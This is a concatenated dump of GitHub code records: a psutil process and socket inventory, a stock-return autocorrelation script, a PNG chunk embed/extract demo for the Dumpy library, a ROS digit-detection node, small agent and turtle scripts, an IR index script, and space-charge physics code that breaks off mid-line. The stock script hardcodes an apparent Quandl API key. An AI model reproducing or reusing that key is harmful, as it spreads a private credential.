socket.herror:\n nic.ipv4_fqdn = nic_name_stat + '.' + socket.gethostname()\n elif snic.family == socket.AddressFamily.AF_INET6:\n nic.ipv6_address = snic.address\n nic.ipv6_mask = snic.netmask\n # ARIANE SERVER DO NOT MANAGE IPv6 CURRENTLY\n pass\n else:\n pass\n self.nics.append(nic)\n\n for pid in psutil.pids():\n try:\n psutil_proc = psutil.Process(pid)\n proc = Process(pid=pid, name=psutil_proc.name(), create_time=psutil_proc.create_time(),\n exe=psutil_proc.exe(), cwd=psutil_proc.cwd(), cmdline=psutil_proc.cmdline(),\n username=psutil_proc.username(),\n cpu_affinity=\n psutil_proc.cpu_affinity() if hasattr(psutil_proc, 'cpu_affinity') else None,\n terminal=psutil_proc.terminal(), uids=psutil_proc.uids().effective,\n gids=psutil_proc.gids().effective)\n\n try:\n proc_connections = psutil_proc.connections()\n except ProcessLookupError:\n proc_connections = []\n\n proc.map_sockets = []\n\n for psutil_connection in proc_connections:\n if psutil_connection.status == psutil.CONN_LISTEN or psutil_connection.status == psutil.CONN_NONE \\\n or psutil_connection.status == psutil.CONN_CLOSE:\n map_socket = MapSocket(family=MapSocket.family_2_string(psutil_connection.family),\n rtype=MapSocket.type_2_string(psutil_connection.type),\n source_ip=psutil_connection.laddr[0],\n source_port=psutil_connection.laddr[1],\n status=psutil_connection.status)\n else:\n map_socket = MapSocket(family=MapSocket.family_2_string(psutil_connection.family),\n rtype=MapSocket.type_2_string(psutil_connection.type),\n source_ip=psutil_connection.laddr[0],\n source_port=psutil_connection.laddr[1],\n destination_ip=psutil_connection.raddr[0],\n destination_port=psutil_connection.raddr[1],\n status=psutil_connection.status)\n if map_socket not in proc.map_sockets:\n proc.map_sockets.append(map_socket)\n map_socket.file_descriptors.append(psutil_connection.fd)\n LOGGER.debug(\"OperatingSystem.sniff - \" + str(psutil_connection))\n\n if proc in self.last_processs:\n for last_proc in self.last_processs:\n if last_proc == proc:\n if last_proc.mapping_id is not None:\n proc.mapping_id = last_proc.mapping_id\n proc.is_node = last_proc.is_node\n else:\n name = '[' + str(proc.pid) + '] ' + str(proc.name)\n LOGGER.debug('OperatingSystem.sniff - process not saved on DB on previous round: ' +\n name)\n self.new_processs.append(proc)\n\n proc.last_map_sockets = copy.deepcopy(last_proc.map_sockets)\n for map_socket in proc.map_sockets:\n if map_socket in proc.last_map_sockets:\n for last_map_socket in proc.last_map_sockets:\n if map_socket == last_map_socket:\n if map_socket.status == psutil.CONN_LISTEN \\\n or map_socket.status == psutil.CONN_NONE \\\n or map_socket.status == psutil.CONN_CLOSE:\n if last_map_socket.source_endpoint_id is not None:\n map_socket.source_endpoint_id = \\\n last_map_socket.source_endpoint_id\n else:\n if proc.new_map_sockets is None:\n proc.new_map_sockets = []\n proc.new_map_sockets.append(map_socket)\n else:\n if last_map_socket.source_endpoint_id is not None \\\n and last_map_socket.destination_endpoint_id is not None \\\n and last_map_socket.link_id is not None \\\n and last_map_socket.transport_id is not None:\n map_socket.source_endpoint_id = last_map_socket.source_endpoint_id\n map_socket.osi_id = last_map_socket.destination_osi_id\n map_socket.subnet_id = last_map_socket.destination_subnet_id\n map_socket.routing_area_id = \\\n last_map_socket.destination_routing_area_id\n map_socket.location_id = last_map_socket.destination_location_id\n map_socket.destination_endpoint_id = \\\n last_map_socket.destination_endpoint_id\n map_socket.destination_node_id = \\\n last_map_socket.destination_node_id\n map_socket.destination_container_id = \\\n last_map_socket.destination_container_id\n map_socket.link_id = last_map_socket.link_id\n map_socket.transport_id = last_map_socket.transport_id\n else:\n if proc.new_map_sockets is None:\n proc.new_map_sockets = []\n proc.new_map_sockets.append(map_socket)\n\n for map_socket in proc.last_map_sockets:\n if map_socket not in proc.map_sockets:\n if map_socket.source_endpoint_id is not None or \\\n map_socket.destination_endpoint_id is not None:\n if proc.dead_map_sockets is None:\n proc.dead_map_sockets = []\n proc.dead_map_sockets.append(map_socket)\n break\n else:\n self.new_processs.append(proc)\n\n self.processs.append(proc)\n except psutil.NoSuchProcess:\n LOGGER.debug(\"OperatingSystem.sniff - process \" + str(pid) + \" doesnt exist anymore\")\n except psutil.AccessDenied:\n LOGGER.debug(\"OperatingSystem.sniff - access denied for process \" + str(pid))\n\n for process in self.last_processs:\n if process not in self.processs:\n self.dead_processs.append(process)\n","repo_name":"echinopsii/net.echinopsii.ariane.community.plugin.procos","sub_path":"ariane_procos/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":34238,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"5050595288","text":"\n\nimport pandas as pd\nimport quandl\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nimport statsmodels.graphics.tsaplots as tsplots\nimport numpy as np\nimport scipy.stats as st\n\nquandl.ApiConfig.api_key='HT4ys9sgAtiAwG_VUQiu'\npd.set_option(\"display.max_rows\",10)\nStockPrices=quandl.get_table(\"WIKI/PRICES\",ticker=['IBM','MSFT','INTC','AAPL'],qopts={'columns':['ticker','date','adj_close','adj_volume']},\ndate={'gte':'1990-1-1','lte':'2017-12-31'},paginate=True)\n# StockPrices=quandl.get_table(\"WIKI/PRICES\",ticker=['TSLA'],qopts={'columns':['ticker','date','adj_close','adj_volume']},\n# date={'gte':'2000-1-1','lte':'2017 -12-31'},paginate=True)\ndf=StockPrices.pivot(index='date',columns='ticker',values='adj_close')\ndf.fillna(method='ffill')\ndf.dtypes\ndf=df.astype('float')\n\nStockReturns=df.pct_change()\nstock_prices_monthly=df.resample('M').last()\nstock_returns_monthly=stock_prices_monthly.pct_change()\nprint(stock_returns_monthly)\n\ndef auto_test(name):\n biased_acovf = sm.tsa.stattools.acovf(stock_returns_monthly[name], missing = 'drop')\n unbiased_acovf = sm.tsa.stattools.acovf(stock_returns_monthly[name], missing = 'drop', adjusted=True)\n biased_acf = sm.tsa.stattools.acf(stock_returns_monthly[name], missing = 'drop')\n unbiased_acf = sm.tsa.stattools.acf(stock_returns_monthly[name], missing = 'drop', adjusted=True)\n print(\"----------------------------------\"+name+\"start------------------------------\")\n print(\"biased_acovf:\",biased_acovf[:10])\n print(\"unbiased_acovf:\",unbiased_acovf[:10])\n print(\"biased_acf:\",biased_acf[:10])\n print(\"unbiased_acf:\",unbiased_acf[:10])\n print(\"----------------------------------\"+name+\" end------------------------------\")\n\n# auto_test('AAPL')\n# auto_test('TSLA') #特斯拉\n# auto_test('IBM')\n# auto_test('MSFT')\n# auto_test('INTC')\n\n\ndef test_plot(name):\n tsplots.plot_acf(stock_returns_monthly[name][1:],lags=20,alpha=0.05)\n plt.show()\n tsplots.plot_pacf(stock_returns_monthly[name][1:].values,lags=20,alpha=0.05)\n plt.show()\n# test_plot('AAPL')\n# test_plot('TSLA')\n# test_plot('IBM')\n# test_plot('MSFT')\n# test_plot('INTC')\n\ndef Jr_stat(data,q):\n data=data[len(data) % q:] #扔掉mod(q)的余数\n n=int(len(data)/q)\n data_tmp=[0]*n\n sigma_a2=sum(np.power(data,2))\n for i in range(q):\n data_tmp=data_tmp+data[i::q]\n sigma_b2=sum(np.power(data_tmp,2))\n return sigma_b2/sigma_a2-1,n\n\ndef VR_test(data,q):\n [Jr,n]=Jr_stat(data,q)\n return (1-st.norm.cdf(np.sqrt(n)*abs(Jr)))*2\n\nprint(\"IBM p_value for q=2 is \",VR_test(stock_returns_monthly['IBM'].values[1:],2))\nprint(\"MSFT p_value for q=2 is \",VR_test(stock_returns_monthly['MSFT'].values[1:],2))\nprint(\"INTC p_value for q=2 is \",VR_test(stock_returns_monthly['INTC'].values[1:],2))\nprint(\"AAPL p_value for q=2 is \",VR_test(stock_returns_monthly['AAPL'].values[1:],2))\n# print(\"TSLA p_value for q=2 is \",VR_test(stock_returns_monthly['TSLA'].values[1:],2))\n","repo_name":"ChrisInBed/StockPriceRNN","sub_path":"group_project1/group_project1.py","file_name":"group_project1.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"20294128575","text":"\"\"\"\nThis little script demonstrates how to use ``Dumpy`` composite types.\n\nYou can use this script to list the chunks in a PNG file, or embed/extract\narbitrary files into/from PNG files. It has no dependency except ``Dumpy``\nitself.\n\nInvoke with no argument to see the full usage.\n\nSee http://www.w3.org/TR/PNG/ for the full spec of the PNG format.\n\n\"\"\"\n\n\nimport sys\nimport os\nimport argparse\nimport dumpy.config as dc\n\n# You can set the global endianness by assigning a ``struct`` endian character\n# to ``dumpy.config.ENDIAN`` **before** importing ``dumpy.types``.\n# See the documentation of the ``struct`` module for supported endians.\ndc.ENDIAN = '>' # Big endian for PNG\nimport dumpy.types as dt\n\n\n# ================== Data Structures ==================\n#\n# The PNG format is organized in different types of ``chunks``, and each\n# type has its pre-defined structure. The whole PNG structure looks like\n# this:\n#\n# PNG_FILE\n# SIGNATURE\n# CHUNK_1\n# CHUNK_2\n# CHUNK_3\n# ....\n# CHUNK_n\n#\n# The data structures defined here are to handle the signature and different\n# kinds of chunks.\n#\n\n\ndef check_png_signature(sig, _finfo):\n sig_bytes = bytes(sig)\n if sig_bytes != b'\\x89\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a':\n raise ValueError('Bad PNG signature: {}'.format(repr(sig_bytes)))\n\n\n# We need to define a class for each composite type. The class\n# has to inherit from a mapping type (Usually the built-in ``dict``)\n# and use ``dumpy.types.DumpyMeta`` as its meta class.\nclass PNGSignature(dict, metaclass=dt.DumpyMeta):\n \"\"\"This class represents the 8-byte PNG signature:\n b'\\x89\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a'\n \"\"\"\n\n # Each class for a composite type must have a ``__field_specs__``\n # member, to specify the fields it contains. ``__field_specs__``\n # can be any iterable that yields field specifications. Since we\n # cannot modify the field specs after the class definition, a tuple\n # is sufficient.\n __field_specs__ = (\n # A field spec is in the form ``(name, type, count, default)``.\n # You can write a tuple directly, or you can also use the convenient\n # function ``dumpy.types.field(...)`` to make the specs more clear.\n\n # Here we have a field named ``signature``, with a size of 8 bytes.\n # We can specify a validator callback for a field. When unpacking\n # binary data, the validator will be called with the unpacked field\n # value.\n dt.field('signature', dt.UInt8, count=8, validator=check_png_signature),\n )\n\n\nclass DataIHDR(dict, metaclass=dt.DumpyMeta):\n \"\"\"This class represents the PNG IHDR chunk, which stores basic\n image properties.\n \"\"\"\n\n __field_specs__ = (\n # Unspecified field counts default to 1\n # And unspecified default values default to ``dumpy.types.NoDefault``\n\n dt.field('width', dt.UInt32),\n dt.field('height', dt.UInt32),\n dt.field('bit_depth', dt.UInt8),\n dt.field('color_type', dt.UInt8),\n dt.field('compression_method', dt.UInt8),\n dt.field('filter_method', dt.UInt8),\n dt.field('interlace_method', dt.UInt8),\n )\n\n\nclass DataDEAD(dict, metaclass=dt.DumpyMeta):\n \"\"\"This class represents our custom ``deAd`` chunk, which contains\n the name and the content of a single file. The type of a ``deAd`` chunk\n is b'deAd'.\n \"\"\"\n\n __field_specs__ = (\n # Field counts and default values can be calculated on the fly.\n # Just pass a callable, and the callable will be called with the\n # object parsed so far as its sole argument, to get the proper value.\n\n # ``dumpy.types.count_of(...)`` and ``dumpy.types.counted_by(...)``\n # are two convenient functions to calculate lengths.\n\n dt.field('name_len', dt.UInt32, default=dt.count_of('name')),\n dt.field('name', dt.UInt8, count=dt.counted_by('name_len')),\n dt.field('data_len', dt.UInt32, default=dt.count_of('data')),\n dt.field('data', dt.UInt8, count=dt.counted_by('data_len')),\n )\n\n\ndef get_unknown_data_count(obj):\n \"\"\"Used by ``DataUnknown`` to determine how many data bytes are there in\n the ``data`` field.\"\"\"\n\n # All ``Dumpy`` composite objects have a ``parent`` attribute, which is a\n # weakref to the upper level object. The ``parent`` is ``None`` if the\n # object have no parent.\n\n # We are dealing with ``DataUnknown`` objects here, so the parent is a\n # ``PNGChunk`` object. The length of the ``data`` field in ``DataUnknown``\n # is determined by the ``length`` field in ``PNGChunk``.\n # See http://www.w3.org/TR/PNG/#5Chunk-layout\n chunk_obj = obj.parent()\n return chunk_obj['length']\n\n\nclass DataUnknown(dict, metaclass=dt.DumpyMeta):\n \"\"\"This class represents the chunk data that we don't recognize.\"\"\"\n\n __field_specs__ = (\n dt.field('data', dt.UInt8, count=get_unknown_data_count),\n )\n\n\ndef get_chunk_data_type(obj):\n \"\"\"Used by PNGChunk to determine which class to use when dealing with\n chunk data.\"\"\"\n\n # ``obj`` is a ``PNGChunk`` instance.\n # Any field with a count larger than 1, or with a dynamic count,\n # will be turned into a ``list``. Here we convert the ``type`` field to\n # ``bytes``, to ease subsequent processing.\n chunk_type = bytes(obj['type'])\n try:\n return obj.data_types[chunk_type]\n except KeyError:\n return DataUnknown\n\n\nclass PNGChunk(dict, metaclass=dt.DumpyMeta):\n __field_specs__ = (\n # The ``data`` field is always a Dumpy composite type, and each\n # composite type automatically provides a ``size`` property.\n dt.field('length', dt.UInt32, default=lambda o: o['data'].size),\n dt.field('type', dt.UInt8, count=4),\n\n # Here's a variable field type. We pass a callable to\n # ``dumpy.types.VariableType``, and this callable will be called when\n # the framework needs to determine which class to use when dealing with\n # this field. The callable works just like dynamic counts and dynamic\n # defaults.\n dt.field('data', dt.VariableType(get_chunk_data_type)),\n\n # TODO: Add a calculated default CRC value\n dt.field('crc', dt.UInt32, default=0),\n )\n\n data_types = {\n b'IHDR': DataIHDR,\n b'deAd': DataDEAD,\n }\n\n\ndef check_chunk_continue(obj):\n if len(obj['chunks']) <= 0:\n return True\n else:\n last_chunk_type = bytes(obj['chunks'][-1]['type'])\n return last_chunk_type != b'IEND'\n\n\nclass PNGFile(dict, metaclass=dt.DumpyMeta):\n __field_specs__ = (\n dt.field('signature', PNGSignature),\n dt.field('chunks', PNGChunk, count=check_chunk_continue),\n )\n\n\n# ================== Data Structures end ==================\n\n\ndef flatten_list(l):\n for e in l:\n if isinstance(e, list):\n yield from flatten_list(e)\n else:\n yield e\n\n\ndef read_png(png_file):\n with png_file:\n data = png_file.read()\n png = PNGFile.unpack_from(data, 0)\n\n # ``data`` should be empty at this point, but the PNG format seems to allow\n # trailing bytes, so save the remaining bytes, just in case.\n data = data[png.size:]\n\n return (png, data)\n\n\ndef pack_file_into_dead_chunk(extra_file):\n dead = DataDEAD()\n # Field types are checked (partially) when assigning field values:\n # 1. A field with a count larger than 1, or a dynamic count, can only be\n # assigned a sequence of Dumpy objects, or a sequence of objects that can\n # be automatically converted to Dumpy objects.\n # 2. A field with a count of 1 can only accept a single Dumpy object, or an\n # object that can be automatically converted to a Dumpy object.\n # 3. A field with a count smaller than 1 cannot be assigned any value.\n # Trying to do so will cause a ValueError. Dynamic count functions may\n # return 0 to indicate that the field doesn't exist.\n dead['name'] = os.path.split(extra_file.name)[1].encode()\n dead['data'] = extra_file.read()\n\n chunk = PNGChunk()\n chunk['type'] = b'deAd'\n chunk['data'] = dead\n\n return chunk\n\n\ndef list_chunks(args):\n if args.png_file is None:\n raise RuntimeError('No PNG file to list.')\n\n png, extra_data = read_png(args.png_file)\n\n for chunk in png['chunks']:\n chunk_type = bytes(chunk['type'])\n\n print('Chunk: {} {:8} bytes'\n .format(chunk_type.decode(), chunk['length']))\n\n if chunk_type == b'deAd':\n print(' deAd chunk, file name: {}, file size: {}'\n .format(repr(bytes(chunk['data']['name']).decode()),\n chunk['data']['data_len']))\n elif chunk_type in PNGChunk.data_types:\n print(' data: {}'.format(chunk['data']))\n\n print('{} extra bytes in PNG stream'.format(len(extra_data)))\n\n\ndef pack_files(args):\n if args.png_file is None:\n raise RuntimeError('No PNG file to pack into.')\n\n if args.output is None:\n raise RuntimeError('Output file not specified.')\n\n png, extra_data = read_png(args.png_file)\n\n files_to_pack = flatten_list(args.pack)\n with open(args.output, 'xb') as out_file:\n for f in files_to_pack:\n print('Packing {} ....'.format(repr(f.name)))\n with f:\n new_chunk = pack_file_into_dead_chunk(f)\n png['chunks'].insert(-1, new_chunk)\n\n out_file.write(png.pack())\n out_file.write(extra_data)\n\n print('Done.')\n\n\ndef extract_files(args):\n if args.png_file is None:\n raise RuntimeError('No PNG file to extract from.')\n\n if args.output is None:\n raise RuntimeError('Output directory not specified.')\n\n if not os.path.isdir(args.output):\n raise RuntimeError('\\'--output\\' argument is not a directory.')\n\n png, extra_data = read_png(args.png_file)\n\n files_to_extract = list(flatten_list(args.extract))\n for c in png['chunks']:\n if isinstance(c['data'], DataDEAD):\n file_name = bytes(c['data']['name']).decode()\n if file_name in files_to_extract:\n print('Extracting {} ....'.format(repr(file_name)))\n full_name = os.path.join(args.output, file_name)\n with open(full_name, 'xb') as out_file:\n out_file.write(bytes(c['data']['data']))\n files_to_extract.remove(file_name)\n\n if len(files_to_extract) > 0:\n print('File(s) not found:')\n for f in files_to_extract:\n print(' {}'.format(repr(f)))\n\n print('Done.')\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('png_file',\n help='The PNG file to read',\n metavar='PNG',\n nargs='?',\n type=argparse.FileType(mode='rb'))\n\n parser.add_argument('-o', '--output',\n help='The file to write to. When extracting files, '\n 'this should be a directory for storing extracted '\n 'files',\n type=str)\n\n cmd_group = parser.add_mutually_exclusive_group()\n\n cmd_group.add_argument('-l', '--list-chunks',\n help='List the chunks in a PNG file',\n action='store_true')\n\n cmd_group.add_argument('-p', '--pack',\n help='Pack file(s) into the PNG file',\n metavar='FILE',\n nargs='+',\n action='append',\n type=argparse.FileType(mode='rb'))\n\n cmd_group.add_argument('-x', '--extract',\n help='Extract files from the PNG file',\n metavar='FILE',\n nargs='+',\n action='append',\n type=str)\n\n return (parser, parser.parse_args())\n\n\nif __name__ == '__main__':\n parser, args = parse_arguments()\n\n if args.list_chunks:\n list_chunks(args)\n elif args.pack:\n pack_files(args)\n elif args.extract:\n extract_files(args)\n else:\n parser.print_help()\n","repo_name":"l04m33/dumpy","sub_path":"demo/png_packer.py","file_name":"png_packer.py","file_ext":"py","file_size_in_byte":12272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"23079806579","text":"#!/usr/bin/env python3\nimport numpy as np\nimport os\nimport math\nimport cv2\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nimport rospy\nfrom duckietown.dtros import DTROS, TopicType, NodeType\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import CompressedImage\nimport rospkg\n\nHOST_NAME = os.environ[\"VEHICLE_NAME\"]\n\n\nclass Digit_Detection(DTROS):\n\n def __init__(self,node_name):\n\n super(Digit_Detection, self).__init__(node_name=node_name, node_type=NodeType.PERCEPTION)\n\n self.sub = rospy.Subscriber(f'/{HOST_NAME}/cropped_digit/compressed', CompressedImage, self.callback)\n self.pub = rospy.Publisher(f'/{HOST_NAME}/april_tag_node/detected_digit', String, queue_size=10)\n\n self.image = None\n self.model = None\n self.rospack = rospkg.RosPack()\n self.path = self.rospack.get_path(\"digit_detection_node\")\n self.trained_model = str(self.path) + \"/src/digit_detection.model\"\n self.prediction = None\n\n\n def callback(self, msg):\n # how to decode compressed image\n # reference: http://wiki.ros.org/rospy_tutorials/Tutorials/WritingImagePublisherSubscriber\n msg.header.seq\n compressed_image = np.frombuffer(msg.data, np.uint8)\n im = cv2.imdecode(compressed_image, cv2.IMREAD_COLOR)\n im = im[:,:,0]\n self.image = im\n self.predict(msg.header.seq)\n\n def load_model(self):\n self.model = tf.keras.models.load_model(self.trained_model)\n\n def predict(self,sequence):\n tf.keras.utils.normalize(self.image,axis=0)\n prediction = self.model.predict(self.image[np.newaxis, :, :], verbose=0)\n print(f\"The detected digit is: {np.argmax(prediction)}\")\n self.pub.publish(String(str(sequence) + \" \" + str(np.argmax(prediction))))\n\nif __name__ == '__main__':\n digit_node = Digit_Detection(\"digit_detection_node\")\n digit_node.load_model()\n rospy.spin()","repo_name":"Tur4L/cmput412_tur4l","sub_path":"Lab5/digit_detection_node/packages/digit_detection_node/src/digit_detection_node.py","file_name":"digit_detection_node.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"74666405675","text":"import random\nfrom spade import agent\n\n\nfrom Behaviours.profReview_Behav import ProfReviewBehav\nfrom Behaviours.receiveRequests_Behav import ReceiveRequestBehav\n\n\nclass SellerAgent(agent.Agent):\n\n products_sold = {}\n products_value = {}\n products = ['Apple', 'Banana', 'Grapefruit', 'Orange', 'Pear', 'Melon', 'Strawberry']\n\n async def setup(self):\n print(\"Agent {}\".format(str(self.jid)) + \"starting...\")\n\n for i in self.products:\n self.products_sold[i] = 0\n self.products_value[i] = random.randint(1, 10)\n\n a = ReceiveRequestBehav()\n b = ProfReviewBehav(period=10)\n\n self.add_behaviour(a)\n self.add_behaviour(b)","repo_name":"FranciscoReisIzquierdo/Agentes-e-Sistemas-Multiagente","sub_path":"Aulas/Aula3/sellerAgent.py","file_name":"sellerAgent.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"41014009522","text":"import math_figures\nimport turtle as t\n\ndef main():\n t.speed(0)\n for angle in range(1, 360, 10):\n t.seth(angle)\n t.color(math_figures.randomColor())\n t.circle(100)\n\n\n t.Screen().exitonclick()\n\n\nif __name__ == '__main__':\n main()","repo_name":"George-Smirnoff/Bootcamp-100","sub_path":"Day_18/spirograph.py","file_name":"spirograph.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"19262828306","text":"import os\nimport numpy as np\nimport pandas as pd\nimport math\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom natsort import natsorted\n\nstop_words = stopwords.words('english')\nstop_words.remove('where')\nstop_words.remove('in')\nstop_words.remove('to')\n\nfiles_name = natsorted(os.listdir('files'))\ndocuments = []\nfor files in files_name:\n with open(f'files/{files}', 'r') as f:\n document = f.read()\n tokenized_documents = word_tokenize(document)\n terms = []\n for word in tokenized_documents:\n if word not in stop_words:\n terms.append(word)\n documents.append(terms)\n print(tokenized_documents)\ndocument_number = 1\npositional_index = {}\n\nfor document in documents:\n\n for positional, term in enumerate(document):\n\n if term in positional_index:\n\n positional_index[term][0] = positional_index[term][0] + 1\n\n if document_number in positional_index[term][1]:\n positional_index[term][1][document_number].append(positional)\n else:\n positional_index[term][1][document_number] = [positional]\n\n else:\n positional_index[term] = []\n positional_index[term].append(1)\n positional_index[term].append({})\n positional_index[term][1][document_number] = [positional]\n\n document_number = document_number + 1\nprint(positional_index)\nquery = 'antony brutus'\n\nfinal_list = [[] for i in range(10)]\n\nfor word in query.split():\n for key in positional_index[word][1].keys():\n\n if final_list[key - 1] != []:\n if final_list[key - 1][-1] == positional_index[word][1][key][0] - 1:\n final_list[key - 1].append(positional_index[word][1][key][0])\n else:\n final_list[key - 1].append(positional_index[word][1][key][0])\n\nfor position, list in enumerate(final_list, start=1):\n\n if len(list) == len(query.split()):\n print(position)\nall_words = []\nfor doc in documents:\n for word in doc:\n all_words.append(word)\n\n\ndef get_freq_term(d):\n words_found = dict.fromkeys(all_words, 0)\n for w in d:\n words_found[w] += 1\n return words_found\n\n\nterm_freq = pd.DataFrame(get_freq_term(documents[0]).values(), index=get_freq_term(documents[0]).keys())\nfor i in range(1, len(documents)):\n term_freq[i] = get_freq_term(documents[i]).values()\n\nprint(term_freq)\n\n\ndef get_wighted_term_freq(x):\n if x > 0:\n return math.log(x) + 1\n return 0\n\n\ntfd = pd.DataFrame(columns=['freq', 'idf'])\nfor i in range(len(term_freq)):\n frequency = term_freq.iloc[i].values.sum()\n tfd.loc[i, 'freq'] = frequency\n tfd.loc[i, 'idf'] = math.log(10 / (float(frequency)))\ntfd.index = term_freq.index\nterm_freq_inve_doc_freq = term_freq.multiply(tfd['idf'], axis=0)\n\nprint(term_freq_inve_doc_freq)\n\ndocument_lengths = pd.DataFrame()\n\n\ndef get_doc_length(col):\n return np.sqrt(term_freq_inve_doc_freq[col].apply(lambda x: x ** 2).sum())\n\n\nfor column in term_freq_inve_doc_freq.columns:\n document_lengths.loc[0, f'{column}_len'] = get_doc_length(column)\n\nprint(document_lengths)\n\nnormalize_term_freq_idf = pd.DataFrame()\n\n\ndef get_normalized(col, x):\n try:\n return x / document_lengths[f'{col}_len'].values[0]\n except:\n return 0\n\n\nfor column in term_freq_inve_doc_freq.columns:\n normalize_term_freq_idf[column] = term_freq_inve_doc_freq[column].apply(lambda x: get_normalized(column, x))\n\nprint(normalize_term_freq_idf)\n","repo_name":"MohamedRamadan200224/searching-files-by-python","sub_path":"ir.py","file_name":"ir.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"9200759649","text":"from scipy.constants import e as echarge\n\nfrom ..base_classes import Element\nfrom .gaussian_fields import get_Ex_Ey_Gx_Gy_gauss\nfrom .qgauss import QGauss\nfrom scipy.interpolate import CubicSpline\n\n\nclass SCCoasting(Element):\n \"\"\"Space charge for a coasting beam.\"\"\"\n\n _description = [\n (\"number_of_particles\", \"\", \"Number of particles in the beam\", 0.0),\n (\"circumference\", \"m\", \"Machine circumference\", 1.0),\n (\"sigma_x\", \"m\", \"Horizontal size of the beam (r.m.s.)\", 1.0),\n (\"sigma_y\", \"m\", \"Vertical size of the beam (r.m.s.)\", 1.0),\n (\"length\", \"m\", \"Integration length of space charge kick\", 0.0),\n (\"x_co\", \"m\", \"Horizontal closed orbit offset\", 0.0),\n (\"y_co\", \"m\", \"Vertical closed orbit offset\", 0.0),\n ]\n _extra = [\n (\"min_sigma_diff\", \"m\", \"Threshold to detect round beam\", 1e-8),\n (\"enabled\", \"\", \"Switch to disable space charge effect\", True),\n ]\n\n def track(self, p):\n if self.enabled:\n charge = p.q0 * echarge\n\n Ex, Ey = get_Ex_Ey_Gx_Gy_gauss(\n p.x - self.x_co,\n p.y - self.y_co,\n self.sigma_x,\n self.sigma_y,\n min_sigma_diff=self.min_sigma_diff,\n skip_Gs=True,\n mathlib=p._m,\n )\n\n fact_kick = (\n p.chi\n * self.number_of_particles\n / self.circumference\n * (charge * p.charge_ratio)\n * charge\n * (1 - p.beta0 * p.beta0)\n / (p.p0c * echarge * p.beta0)\n * self.length\n )\n\n p.px += fact_kick * Ex\n p.py += fact_kick * Ey\n\n\nclass SCQGaussProfile(Element):\n \"\"\"Space charge for a bunched beam with generalised\n Gaussian profile.\n \"\"\"\n\n _description = [\n (\"number_of_particles\", \"\", \"Number of particles in the bunch\", 0.0),\n (\"bunchlength_rms\", \"m\", \"Length of the bunch (r.m.s.)\", 1.0),\n (\"sigma_x\", \"m\", \"Horizontal size of the beam (r.m.s.)\", 1.0),\n (\"sigma_y\", \"m\", \"Vertical size of the beam (r.m.s.)\", 1.0),\n (\"length\", \"m\", \"Integration length of space charge kick\", 0.0),\n (\"x_co\", \"m\", \"Horizontal closed orbit offset\", 0.0),\n (\"y_co\", \"m\", \"Vertical closed orbit offset\", 0.0),\n ]\n _extra = [\n (\"min_sigma_diff\", \"m\", \"Threshold to detect round beam\", 1e-8),\n (\"enabled\", \"\", \"Switch to disable space charge effect\", True),\n (\n \"q_parameter\",\n \"\",\n \"q parameter of generalised Gaussian distribution (q=1 for standard Gaussian)\",\n 1.0,\n ),\n ]\n\n def track(self, p):\n if self.enabled:\n distr = QGauss(self.q_parameter, mathlib=p._m)\n sigma = p.zeta / p.rvv\n fact_kick = self.number_of_particles * distr.eval(\n sigma, QGauss.sqrt_beta(self.bunchlength_rms)\n )\n\n charge = p.q0 * echarge\n fact_kick *= p.chi * p.charge_ratio * self.length * charge * charge\n fact_kick *= 1 - p.beta0 * p.beta0\n fact_kick /= p.p0c * echarge * p.beta0\n\n Ex, Ey = get_Ex_Ey_Gx_Gy_gauss(\n p.x - self.x_co,\n p.y - self.y_co,\n self.sigma_x,\n self.sigma_y,\n min_sigma_diff=self.min_sigma_diff,\n skip_Gs=True,\n mathlib=p._m,\n )\n\n p.px += fact_kick * Ex\n p.py += fact_kick * Ey\n\n\nclass SCInterpolatedProfile(Element):\n \"\"\"Space charge for a bunched beam with discretised profile.\"\"\"\n\n _description = [\n (\"number_of_particles\", \"\", \"Number of particles in the bunch\", 0.0),\n (\n \"line_density_profile\",\n \"1/m\",\n \"Discretised list of density values with integral normalised to 1\",\n lambda: [1.0, 1.0],\n ),\n (\"dz\", \"m\", \"Unit distance in zeta between profile points\", 1.0),\n (\"z0\", \"m\", \"Start zeta position of line density profile\", -0.5),\n (\"sigma_x\", \"m\", \"Horizontal size of the beam (r.m.s.)\", 1.0),\n (\"sigma_y\", \"m\", \"Vertical size of the beam (r.m.s.)\", 1.0),\n (\"length\", \"m\", \"Integration length of space charge kick\", 0.0),\n (\"x_co\", \"m\", \"Horizontal closed orbit offset\", 0.0),\n (\"y_co\", \"m\", \"Vertical closed orbit offset\", 0.0),\n ]\n _extra = [\n (\n \"method\",\n \"\",\n \"Interpolation method; 0 == linear (default), 1 == cubic spline\",\n 0,\n ),\n (\"min_sigma_diff\", \"m\", \"Threshold to detect round beam\", 1e-8),\n (\"enabled\", \"\", \"Switch to disable space charge effect\", True),\n ]\n\n def track(self, p):\n if self.enabled:\n n_prof_points = len(self.line_density_profile)\n charge = p.q0 * echarge\n\n Ex, Ey = get_Ex_Ey_Gx_Gy_gauss(\n p.x - self.x_co,\n p.y - self.y_co,\n self.sigma_x,\n self.sigma_y,\n min_sigma_diff=self.min_sigma_diff,\n skip_Gs=True,\n mathlib=p._m,\n )\n\n fact_kick = (\n p.chi\n * (charge * p.charge_ratio)\n * charge\n * (1 - p.beta0 * p.beta0)\n 